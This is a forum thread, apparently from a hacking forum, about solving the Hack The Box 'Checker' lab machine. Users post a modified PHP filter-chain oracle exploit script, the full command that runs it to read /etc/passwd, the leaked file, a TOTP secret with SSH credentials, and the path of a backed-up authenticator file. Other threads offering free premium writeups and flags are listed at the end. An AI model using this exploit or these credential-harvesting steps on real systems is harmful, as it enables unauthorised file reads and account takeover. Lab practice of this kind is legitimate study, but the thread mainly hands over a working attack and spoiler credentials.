Feb 22, 2025, 11:52 PM
I'm not sure..but check this page below maybe it will help
https://thecybersecguru.com/ctf-walkthro...ackthebox/
https://thecybersecguru.com/ctf-walkthro...ackthebox/
|
Checker Hack the Box Season 7 (Linux Hard)
by RedBlock - Saturday February 22, 2025 at 02:24 PM
|
|
Feb 22, 2025, 11:54 PM
(Feb 22, 2025, 09:40 PM)fazemike Wrote:(Feb 22, 2025, 09:29 PM)v3701 Wrote: yes exploit works, modify the script to send payloads with request format, and it'll read file, it's kinda slow, but that's the exploit at requestor.py ```py def req_with_response(self, s): if self.delay > 0: time.sleep(self.delay) filter_chain = f'php://filter/{s}{self.in_chain}/resource={self.file_to_leak}' # DEBUG print(filter_chain) merged_data = self.parse_parameter(filter_chain) # DEBUG print("we sent : ", merged_data['html']) encodedPayload = base64.b64encode(merged_data['html'].encode("ascii")).decode("ascii") newPayload = {"name":"V3701", 'html': "<img src='data:image/png;base64," + encodedPayload + "'\\>"} # DEBUG print('new : ', newPayload) # Make the request, the verb and data encoding is defined try: ``` I made those changes to fit the PUT request for daft saving, the original exploit : https://github.com/synacktiv/php_filter_...le_exploit it's kinda slow, 1 char per request (or 2 request), depends on base64 decoding and here's the passwd file : ```txt root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3  ys:/dev:/usr/sbin/nologinsync:x:4:65534 ync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin systemd-network:x:101:102 ystemd Network Management,,,:/run/systemd:/usr/sbin/nologinsystemd-resolve:x:102:103 ystemd Resolver,,,:/run/systemd:/usr/sbin/nologinmessagebus:x:103:104::/nonexistent:/usr/sbin/nologin systemd-timesync:x:104:105 ystemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologinpollinate:x:105:1::/var/cache/pollinate:/bin/false sshd:x:106:65534::/run/sshd:/usr/sbin/nologin usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin reader:x:1000:1000::/home/reader:/bin/bash mysql:x:108:114:MySQL Server,,,:/nonexistent:/bin/false _laurel:x:999:999::/var/log/laurel:/bin/fals ```
On
https://it-tools.tech/otp-generator Use the secret DVDBRAODLCWF7I2ONA4K5LQLUE then ssh reader@checker.htb:hiccup-publicly-genesis You will get user.txt
Feb 23, 2025, 01:08 AM
(Feb 23, 2025, 12:30 AM)RedBlock Wrote: On How did you find the secret ?
Feb 23, 2025, 01:11 AM
(Feb 23, 2025, 01:08 AM)v3701 Wrote:(Feb 23, 2025, 12:30 AM)RedBlock Wrote: On In this file /backup/home_backup/home/reader/.google_authenticatorThis forum account is currently banned. Ban Length: Permanent (N/A Remaining)
Ban Reason: Leeching.
Feb 23, 2025, 01:13 AM
any hint for root flag
Feb 23, 2025, 01:14 AM
(Feb 23, 2025, 12:02 AM)v3701 Wrote:I'm using this command but is not working, what am i doing wrong?(Feb 22, 2025, 09:40 PM)fazemike Wrote:(Feb 22, 2025, 09:29 PM)v3701 Wrote: yes exploit works, modify the script to send payloads with request format, and it'll read file, it's kinda slow, but that's the exploit python3 filters_chain_oracle_exploit.py \ --target "http://checker.htb/api/pages/1" \ --file "/etc/passwd" \ --parameter "html" \ --verb PUT \ --headers '{"Content-Type": "application/json"}' \ --data '{"name": "ExploitPage"}' \ --json=1 \ --match "Allowed memory size" \ --delay 1
Feb 23, 2025, 01:14 AM
(Feb 23, 2025, 01:11 AM)0xbeef Wrote:(Feb 23, 2025, 01:08 AM)v3701 Wrote:(Feb 23, 2025, 12:30 AM)RedBlock Wrote: On soory, I need to ask again, but how you find this file ? I'm more curious on learning than solving the lab
Feb 23, 2025, 01:17 AM
(Feb 23, 2025, 01:14 AM)htdgthdsfx Wrote:(Feb 23, 2025, 12:02 AM)v3701 Wrote:I'm using this command but is not working, what am i doing wrong?(Feb 22, 2025, 09:40 PM)fazemike Wrote:(Feb 22, 2025, 09:29 PM)v3701 Wrote: yes exploit works, modify the script to send payloads with request format, and it'll read file, it's kinda slow, but that's the exploit inside try statment, you need change merged_data in put to newPayload too |
|
« Next Oldest | Next Newest »
|
| Possibly Related Threads… | |||||
| Thread | Author | Replies | Views | Last Post | |
| Hack the box Pro Labs, VIP, VIP+ 1 month free Method | 23 | 2,165 |
1 hour ago Last Post: kkkato |
||
| [FREE] HackTheBox Academy - CBBH CDSA CPTS All Modules Flags | 20 | 2,491 |
Yesterday, 11:06 PM Last Post: op334 |
||
|
[FREE] HackTheBox All Cheatsheets | 3 | 395 |
Yesterday, 10:36 PM Last Post: op334 |
|
| [FREE] 300+ Writeups PDF HackTheBox/HTB premium retired | 369 | 92,002 |
Yesterday, 04:10 PM Last Post: sabbyahmed |
||
| CBBH Write Ups | 22 | 6,226 |
Yesterday, 06:39 AM Last Post: Usercomplex |
||